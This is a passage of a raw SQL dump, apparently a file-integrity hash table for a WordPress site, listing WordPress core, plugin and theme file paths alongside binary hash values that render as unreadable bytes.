�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('j�L� �.%�~��\0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color.php',0,'���/<8uA��P','���/<8uA��P','����ٚ�W��ct�GR�/�*]��z��3','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('~)�zL�� T\0�','wp-content/plugins/redirection/matches/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lt�k� Zﰠ���p','����C|~�� >���?�]�b���((4�BU�','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1O��2e1����rJ�j','#T�c��x�E��y�ũ��H���>��','',0,'?'),('��W}~�њ�\\0ۯ�','wp-content/themes/healing-touch/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v��&MO�C��S','@vk\r�C�O*�yr� �z �������kQ��','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����3p����ǵ�P','A�j�Ⱦf�F���F�]��0=��|���','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AGd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('�����u��,�\r�{-','wp-content/themes/healthcare/css/font-awesome/less/fixed-width.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\0�!�\'��T(�','j&�R�A�uF͏����4�h`��_\0�!�','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH� \n��g��','',0,'?'),(',�W�a��M�Ş��y','wp-content/themes/doctors/core/contents/part_sidebar/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�A��^����','��d�#��x5�Mq��yCȹ�?�0��\n�','',0,'?'),('Z4s�g��EJ}1 *','wp-content/themes/skt-toothy/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<9��D��j���#�',';���È�z8)�VѠxW!R�I�S���1�','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('t1B9�\nǒ�u��!s#','wp-content/themes/skt-toothy/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��b(��e�H���','&�j�| _Vt����~ru:�+�\"�GABsAe','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7 ��y���U{����ԟ��`��]m��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:,�\'��:l�e����','h�B Z����tUxW(b�\"�S���+��6\0X@�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;�wBwH��3Vo!��','�0��ͩf#���?����:�\0\\O����e�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�m ��ἦ���e','���$��_X��oZ\'�&�\n5��5ԧv','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������\n|=�}','�ӄ=�gHt]{كL�]�_^�.ˌ��i','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('�< =�q���K�iU','wp-content/plugins/redirection/locale/redirection.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���Q���Suǚ �','��>���$��G:�hL�J�ߑ��!��yvȡ�O�','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`���U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o��� l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('�/k�_P<�vܹ','wp-content/themes/healthcare/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��n�%w���H:�','�A�J0\"�(31B��HCv���o���V','',0,'?'),('����\\�}���)+��Z','wp-content/themes/doctors/core/home/blocks/text/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�D���D��+�q�6\0�','�� M+�X�h�y��F�c{��EF�3��\0','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�o��\0X#�83�~','��$�>���\n\ZW��)O��\0����(\n�ݮ�\08','',0,'?'),('���#���� >�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�W@gU�_4����','�\r��I&���ċ�9wƙ攢�J�_G�','',0,'?'),('�F�:��0��r8�jK','wp-content/themes/vision-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cبnM+a�&=�k��','�J�*�q���Jg���TJmc��K˱\\��4','',0,'?'),('�&� A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nt�|�\'3�� 0���','\rL�G��6���q ��\\�-���P�I���','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<�� Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W�� �v_�#�� f��~��R�>','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3ܧ_����Z�#�t','�V5�Rj:Z��.���\n5� ��_�3�O�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���{�����&ij��','ڙ��ڢ��D��W����\rэ��3�U��','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�\'I5��xN�$��','�m����<�� p�(t)P7��r�~^��闦��','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�12�;�j�4�F|','ȾLg7���ԠB�$Ru�H�������io��','',0,'?'),('5F��^G��@s�d�','wp-content/themes/doctors/core/contents/loop_comments/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��n��x\"\r��8','j,T%F��ভ=��wwv�^�MȘ#9i��H_$','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�: ��\r�j','����Z5L�ѾR��9��� `C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�j�����\Z','��D���8>�̓��hv�!�5�y�1��','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��|�bA~tb`*','�����}͒l>��-A�����T�$��]n','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��@�Q�zGz�H','\"e�5�����-��fh�b?#r��=�a�v͠�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�@~vȃ���A','JvQܢZ�f��ґ3���(8tЇa�KC�@�e�','',0,'?'),('�/�V� X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),(' QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),(' ?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),(' ,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),(' 4wb]:�/J��D�ӓ','wp-content/themes/skt-toothy/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���D�YHl�e�Q','6�cf�9m<0H�<#�O\'��&$���o-ƹ߁','',0,'?'),(' 7�������f `','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m �8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),(' J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),(' P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),(' X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]t\r;��B�� ��]�','����\r �?���\"��hz�3��L�W�q�5�\"','',0,'?'),(' uıE���P�r��g-','wp-content/themes/doctors/core/contents/part_footer/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��\Z:o*<o3��^^�','�#�Pj�b]l>���vG��v�}���zrj�طj1','',0,'?'),(' ���RL��6�L�n�','wp-content/plugins/redirection/locale/redirection-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ ��@\n>��','E/S�oޯ�L��t��W�G����:=��7HN8S','',0,'?'),(' �h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>��`،�@�8�','p�J^_��Wm�kN_���b�vc\n�����!cU�','',0,'?'),(' ��w���\r�5]�O','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-toggle.php',0,'/�_���wW�?O','/�_���wW�?O','�*b]E�&�JαŠ�\\��4\0b1�>.w!�','',0,'?'),(' �.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),(' ���!�S�\0{��','wp-content/themes/regina-lite/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OR�\r�,��\ZtG��V�','�(㳶�В<��VN��07WMSf�-b���-&9','',0,'?'),(' �l�q�1T��i��','wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�@*�D/�\\�I�','��X�m�W����M����K�t�V8Ɗ�','',0,'?'),(' ˗��8ۖ1B����','wp-content/themes/healthcare/images/photo-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_��Lk��u�&)nX','����dX�ZH�_���x�x�a��#��*�<��}','',0,'?'),(' Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���~9�(��-{�','G�U_�N_xC�`ѳf)�r����s��\Z�\n','',0,'?'),(' �9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk� �6|��{�*\Z��{�H����iܝk^','',0,'?'),(' �)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),(' ��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),(' ����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��p ���TcP\"','4����Z�@�\'x�ȬV��gR��l�\r�%','',0,'?'),(' �/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),(' ��i�AT�Hd��*��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��1z؛d��L','�8�x��\Z݁�[D����A��W/O�wĪ�','',0,'?'),('\n%2F�0��h\"�Ha��','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nw���MȜ�8zA��','wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php',0,'��F�G��)��A0��0','��F�G��)��A0��0','��*�і��2�n���I���br����','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f o��I1Z�N}v�-','̈́q}�0N�PvQ�&k����T�@/`v�','',0,'?'),('\n{X%N8w�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n��=,C��$��Wn','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',0,'���:��\0�:C�uxc�','���:��\0�:C�uxc�','��c�&8�rwϜޮ�?�[6\\�� �����','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n��\'�G�~R*��dj�','wp-content/plugins/redirection/models/action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��aA)bJ�vZ��]','ue����ج���c�|@�M.\"� �r3 ���n','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n���ٰ�p&�s�^p;','wp-content/themes/healthcare/images/BeautySpa.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�VW����|�(�\\�','��#1�}Y\\�=(��^a�\n&ɏ?r�M�O�o','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n�Oe�lg�n�3\"��6�','wp-content/themes/twentynineteen/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~*2W�p �d�','v\\$�YTp�>*�V�&Q���=��^ÍC{ExX','',0,'?'),('\n�!^�划����T\n�','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5vElT��ͤ���Q5','W�F����:ڮU��3���dm�0�� ���','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!��','',0,'?'),('\n�N����J�\'','wp-content/plugins/redirection/models/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��/������p�~��','���M�F�\rω[~�uL*~�\0�*�@�Ǩ���','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&�0G�����Q��ʚ','�gJRb��\0tf�2Å�&��0u�jYH�i��','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ϳ�FY�� p*','~!Z���7��/���<��3�Y�,�=Zk(','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('}spK�� ��:�','wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY�]�Z�.^<��&Un','�G�,|�8������i1��<2�,�8��+w','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy� m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q ,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('���1�kX�^�ۭ\0','wp-content/themes/healing-touch/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xF����^��e�','��:_�s{fn<ɺ5�ЏH�iNju�*>p��','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+ �','',0,'?'),('�+ҝ�\r Uڟw����','wp-content/themes/regina-lite/sections/section-home-testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��p���W��Ӽ5','�_{�ʄZ�S:�P�Ξ�8\"\n\'���V@�','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('��\'��k��[��u','wp-content/themes/wp-barrister/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VY���E��}��,qY�','����� O�aS�C\0�_Df��r�Į\"<3�','',0,'?'),('�c\"ml� 